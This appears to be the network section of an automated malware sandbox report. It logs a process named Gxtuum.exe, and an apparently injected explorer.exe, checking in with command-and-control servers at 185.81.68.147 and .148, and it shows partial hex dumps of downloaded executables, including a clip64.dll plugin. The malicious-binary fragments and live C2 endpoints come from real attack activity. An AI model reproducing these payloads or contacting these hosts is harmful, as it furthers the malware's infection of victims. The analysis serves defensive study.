                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 18:53:38 GMT
                                                                                                                                                                                                ETag: "138c00-629173b693080"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 1281024
                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 e5 c9 44 c2 84 a7 17 c2 84 a7 17 c2 84 a7 17 d6 ef a3 16 d6 84 a7 17 d6 ef a4 16 d2 84 a7 17 d6 ef a2 16 73 84 a7 17 90 f1 a2 16 86 84 a7 17 90 f1 a3 16 cd 84 a7 17 90 f1 a4 16 c8 84 a7 17 d6 ef a6 16 cf 84 a7 17 c2 84 a6 17 01 84 a7 17 0e f1 ae 16 c6 84 a7 17 0e f1 a7 16 c3 84 a7 17 0e f1 58 17 c3 84 a7 17 0e f1 a5 16 c3 84 a7 17 52 69 63 68 c2 84 a7 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 82 96 5a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 c8 0f 00 00 38 04 00 00 00 00 00 c4 fa 0c 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$DsXRichPEdZg" 8P`~X~ `0lpp8.text `.rdata@@.dataD@.pdata`@@_RDATAt@@.rsrc v@@.relocl0x@B
                                                                                                                                                                                                Dec 13, 2024 08:20:07.276989937 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 07 63 11 00 48 8d
                                                                                                                                                                                                Data Ascii: H(A HcHcH,H(+H(A HbH03HlH(H(AHbH HH(H(A Hb
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277003050 CET1236INData Raw: 48 8d 0d 70 be 12 00 e8 d3 0b 0c 00 48 8d 0d ec 8c 0f 00 48 83 c4 28 e9 9b e6 0c 00 cc cc cc 48 83 ec 28 41 b8 14 00 00 00 48 8d 15 c7 62 11 00 48 8d 0d 60 c3 12 00 e8 a3 0b 0c 00 48 8d 0d 2c 8d 0f 00 48 83 c4 28 e9 6b e6 0c 00 cc cc cc 48 83 ec
                                                                                                                                                                                                Data Ascii: HpHH(H(AHbH`H,H(kH(AHbHPsHlH(;H(AHbHCHH(H(A HbHpHH(H(E3HH
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277079105 CET1236INData Raw: b8 28 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d 50 bd 12 00 e8 f3 06 0c 00 48 8d 0d 6c 93 0f 00 48 83 c4 28 e9 bb e1 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d a0 c1 12 00 e8 c3 06 0c 00 48 8d 0d ac 93 0f 00 48 83 c4
                                                                                                                                                                                                Data Ascii: (H`HPHlH(H(AH`HHH(H(AH`HPHH([H(AH`HcH,H(+H(AH_`Hp3HlH(H(A
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277091026 CET1236INData Raw: 0b dd 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 e7 5d 11 00 48 8d 0d f0 b4 12 00 e8 13 02 0c 00 48 8d 0d ec 99 0f 00 48 83 c4 28 e9 db dc 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 bf 5d 11 00 48 8d 0d 40 bf 12 00 e8 e3 01
                                                                                                                                                                                                Data Ascii: H(AH]HHH(H(AH]H@H,H(H(AH]HHlH({H(AHo]HHH(KH(AHO]H0SHH(
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277170897 CET1236INData Raw: 48 8d 0d 2c a0 0f 00 48 83 c4 28 e9 2b d8 0c 00 cc cc cc 48 83 ec 28 41 b8 34 00 00 00 48 8d 15 7f 5c 11 00 48 8d 0d 50 ba 12 00 e8 33 fd 0b 00 48 8d 0d 6c a0 0f 00 48 83 c4 28 e9 fb d7 0c 00 cc cc cc 48 83 ec 28 41 b8 28 00 00 00 48 8d 15 87 5c
                                                                                                                                                                                                Data Ascii: H,H(+H(A4H\HP3HlH(H(A(H\H HH(H(AH\HHH(H(A4Hg\H`H,H(kH(A(Ho\HPsH
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277211905 CET896INData Raw: 23 aa 12 00 e8 86 f8 0b 00 48 8d 0d 4f a9 0f 00 48 83 c4 28 e9 4e d3 0c 00 cc cc cc cc cc cc 48 8d 0d a9 a9 0f 00 e9 3c d3 0c 00 cc cc cc cc 48 83 ec 28 45 33 c0 48 8d 15 e2 b0 10 00 48 8d 0d e3 ae 12 00 e8 46 f8 0b 00 48 8d 0d ef a9 0f 00 48 83
                                                                                                                                                                                                Data Ascii: #HOH(NH<H(E3HHFHH(HIdH3fHPHPH@HPHPHHPHPH@ HP(HP8H@@HPHHPXH@`HPhHPxHHHH
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277226925 CET1236INData Raw: 00 00 00 48 89 90 c8 00 00 00 48 89 90 d8 00 00 00 48 c7 80 e0 00 00 00 0f 00 00 00 48 89 90 e8 00 00 00 48 89 90 f8 00 00 00 48 c7 80 00 01 00 00 0f 00 00 00 48 89 90 08 01 00 00 48 89 90 18 01 00 00 48 c7 80 20 01 00 00 0f 00 00 00 48 89 90 28
                                                                                                                                                                                                Data Ascii: HHHHHHHHH H(H8H@HHHXH`HhHxHHHHHHHHHHHHH
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277237892 CET1236INData Raw: 0f 00 e9 0c cb 0c 00 cc cc cc cc 48 8d 0d 29 a6 0f 00 e9 fc ca 0c 00 cc cc cc cc 48 8d 0d d9 a7 0f 00 e9 ec ca 0c 00 cc cc cc cc 48 8d 0d 59 a7 0f 00 e9 dc ca 0c 00 cc cc cc cc 48 8d 0d 29 a8 0f 00 e9 cc ca 0c 00 cc cc cc cc 48 8d 0d 89 a8 0f 00
                                                                                                                                                                                                Data Ascii: H)HHYH)HHHIHH(HHH(lHQ`HTH(HlHH(4HY(
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277251005 CET1236INData Raw: 00 00 8b 43 28 41 8b f6 44 89 74 24 30 85 c0 7e 35 49 8b fe 0f 1f 00 48 8b 43 20 48 8b 4c 38 08 48 85 c9 74 14 44 38 71 11 74 0e ff 41 14 44 38 71 12 75 05 e8 3e 58 01 00 8b 43 28 ff c6 48 83 c7 20 3b f0 7c d1 48 8d 4c 24 30 45 8b fe 48 89 8b 20
                                                                                                                                                                                                Data Ascii: C(ADt$0~5IHC HL8HtD8qtAD8qu>XC(H ;|HL$0EH IHC Ht(H }FTF<F$FL$0HN}D$0HNH}D$0HN0}D$0HN`}D$0H~@HtHWHH?HuH~H
                                                                                                                                                                                                Dec 13, 2024 08:20:07.397280931 CET1236INData Raw: 5e ca eb 04 89 7c 24 60 8b 44 24 64 66 0f 6e 44 24 60 89 46 14 8b 44 24 68 f3 0f e6 c0 66 c7 46 29 01 00 89 46 18 f2 0f 58 c1 f2 0f 11 46 20 0f b6 03 42 f6 04 30 01 74 18 66 66 0f 1f 84 00 00 00 00 00 0f b6 43 01 48 ff c3 42 f6 04 30 01 75 f2 89
                                                                                                                                                                                                Data Ascii: ^|$`D$dfnD$`FD$hfF)FXF B0tffCHB0u~-u+ukHD$pAHD$PHKH|$HHD$lD$@;E3H|$8AQD$0HD$(D$ :zu[kD$l<HD$pFAt&HB0t


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                42192.168.2.1149937185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:05.963071108 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:07.282926083 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:06 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                43192.168.2.1149939185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:05.963198900 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:07.300534010 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:06 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                44192.168.2.1149943185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:07.493771076 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:07.614911079 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:08.942172050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:08 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                45192.168.2.1149946185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:08.967019081 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:10.326481104 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:09 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                46192.168.2.1149947185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:09.006803036 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:10.326508999 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:09 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                47192.168.2.1149948185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:09.182720900 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:09.302799940 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:10.785655975 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:09 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                48192.168.2.1149952185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:11.025093079 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:11.145339012 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:12.462105036 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:11 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                49192.168.2.1149958185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:12.556629896 CET66OUTGET /7vhfjke3/Plugins/clip64.dll HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878407955 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:13 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 18:53:40 GMT
                                                                                                                                                                                                ETag: "1f000-629173b87b500"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 126976
                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$P@@@~@RichPELZg!Dbp`0@P8@`L.textCD `.rdata*u`vH@@.data@.rsrc@@.reloc@B
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878423929 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 20 68 98 ae 01 10 b9 60 e8 01 10 e8 7f 4d 00 00 68 70 29 01
                                                                                                                                                                                                Data Ascii: j h`Mhp)ZYj hx_Mh)ZYjh?Mh0*ZYj hMh*ZYjhLh*jZYjh
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878631115 CET1236INData Raw: 24 af 01 10 b9 d8 e8 01 10 e8 df 4c 00 00 68 50 2b 01 10 e8 4a 5a 00 00 59 c3 cc cc cc 6a 14 68 44 af 01 10 b9 f0 e8 01 10 e8 bf 4c 00 00 68 b0 2b 01 10 e8 2a 5a 00 00 59 c3 cc cc cc 6a 20 68 5c af 01 10 b9 08 e9 01 10 e8 9f 4c 00 00 68 10 2c 01
                                                                                                                                                                                                Data Ascii: $LhP+JZYjhDLh+*ZYj h\Lh,ZYjh} Lhp,YYjh}8_Lh,YYjhP?Lh0-YYjhhLh-YYjhKh-
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878644943 CET1236INData Raw: 8a 55 00 00 59 c3 cc cc cc 6a 00 68 7d af 01 10 b9 80 ec 01 10 e8 ff 47 00 00 68 f0 39 01 10 e8 6a 55 00 00 59 c3 cc cc cc 6a 0c 68 e0 b2 01 10 b9 98 ec 01 10 e8 df 47 00 00 68 50 3a 01 10 e8 4a 55 00 00 59 c3 cc cc cc 6a 14 68 f0 b2 01 10 b9 b0
                                                                                                                                                                                                Data Ascii: UYjh}Gh9jUYjhGhP:JUYjhGh:*UYjhGh;UYjhGhp;TYjLhX_Gh;TYjh?Gh0<TYjdh(
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878715038 CET1236INData Raw: 10 e8 3f 43 00 00 68 30 48 01 10 e8 aa 50 00 00 59 c3 cc cc cc 6a 0c 68 0c b7 01 10 b9 28 f0 01 10 e8 1f 43 00 00 68 90 48 01 10 e8 8a 50 00 00 59 c3 cc cc cc 6a 34 68 1c b7 01 10 b9 40 f0 01 10 e8 ff 42 00 00 68 f0 48 01 10 e8 6a 50 00 00 59 c3
                                                                                                                                                                                                Data Ascii: ?Ch0HPYjh(ChHPYj4h@BhHjPYj(hTXBhPIJPYjhpBhI*PYj<hBhJPYj0hBhpJOYjh_BhJOY
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878729105 CET1236INData Raw: 05 00 00 83 7d 30 00 0f 84 02 05 00 00 83 7d 48 00 0f 84 f8 04 00 00 c7 85 d8 fb ff ff 00 00 00 00 c7 85 e8 fb ff ff 00 00 00 00 c7 85 ec fb ff ff 0f 00 00 00 c6 85 d8 fb ff ff 00 c6 45 fc 03 8d 8d c0 fb ff ff 6a 2f c7 85 c0 fb ff ff 00 00 00 00
                                                                                                                                                                                                Data Ascii: }0}HEj/h$=jjjjhTE0a}jjjjjECEjPPQ4a}4jjjjjE CE PhXQ8a}LM8uHCM8
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878916979 CET1236INData Raw: 00 00 00 c6 45 20 00 83 fa 10 0f 82 cf 00 00 00 8b 4d 38 42 8b c1 81 fa 00 10 00 00 0f 82 b3 00 00 00 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 c6 00 00 00 e9 9a 00 00 00 6a 00 c7 07 00 00 00 00 8b cf c7 47 10 00 00 00 00 c7 47 14 0f 00 00
                                                                                                                                                                                                Data Ascii: E M8BI#+jGGh}=9Ur(MBrI#+wvRQCU4EEEDM B(I#+w,RQBMdY_^M3
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878930092 CET1236INData Raw: 00 00 c6 45 ac 00 83 fa 10 72 28 8b 4d c8 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 77 38 52 51 e8 a8 3e 00 00 83 c4 08 a1 34 f2 01 10 46 8b 15 20 f2 01 10 e9 a6 fe ff ff 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f
                                                                                                                                                                                                Data Ascii: Er(MBrI#+w8RQ>4F MdY_^M3m>]pUjh$dPSVW3PEdEEEEE }4u0CE P4}EuCEP353=fD
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878942013 CET1236INData Raw: 75 2d 8b 4f 14 8b c7 83 f9 10 72 02 8b 07 80 3c 30 20 74 1b 8b c7 83 f9 10 72 02 8b 07 83 7b 14 10 8b cb 72 02 8b 0b 8a 04 30 e9 cc 00 00 00 83 7f 14 10 89 7d f8 72 05 8b 07 89 45 f8 8b 1d 48 f2 01 10 33 d2 8b 0d 4c f2 01 10 85 db 74 2b 8b 45 f8
                                                                                                                                                                                                Data Ascii: u-Or<0 tr{r0}rEH3Lt+E0E]8C88HtB;rExr3t715LMf]8C88Ht@;r=L8C58+3]{r
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878954887 CET1236INData Raw: 87 84 01 00 00 52 51 e8 24 35 00 00 83 c4 08 0f 10 4d bc 83 7d 1c 10 8d 55 08 f3 0f 7e 45 cc 8d 45 d8 0f 43 55 08 83 7d d0 10 8b 75 cc 66 0f 7e c9 0f 11 4d d8 0f 43 c1 66 0f d6 45 e8 8b 4d 18 89 4d d4 3b f1 75 61 83 ee 04 72 16 0f 1f 44 00 00 8b
                                                                                                                                                                                                Data Ascii: RQ$5M}U~EECU}uf~MCfEMM;uarD;ust4:u't)H:JutH:Jut@:Bt3ME0Gu;3Ur/MFrI#+VQF4UE
                                                                                                                                                                                                Dec 13, 2024 08:20:13.998455048 CET1236INData Raw: 8b 4d f0 33 cd e8 44 30 00 00 8b e5 5d c3 e8 86 62 00 00 e8 75 27 00 00 cc cc cc cc cc 55 8b ec 6a ff 68 2d 26 01 10 64 a1 00 00 00 00 50 53 56 57 a1 08 e0 01 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 ba 7d af 01 10 c7 45 fc 00 00 00 00 8d 4d 08 e8
                                                                                                                                                                                                Data Ascii: M3D0]bu'Ujh-&dPSVW3PEd}EM(|E@Pl5M}CM+IDuNFu+FVj`VSW`PjZW`j(aaWja aUr(MBrI


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                50192.168.2.1149959185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:12.556843042 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:13.893122911 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:13 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                51192.168.2.1149960185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
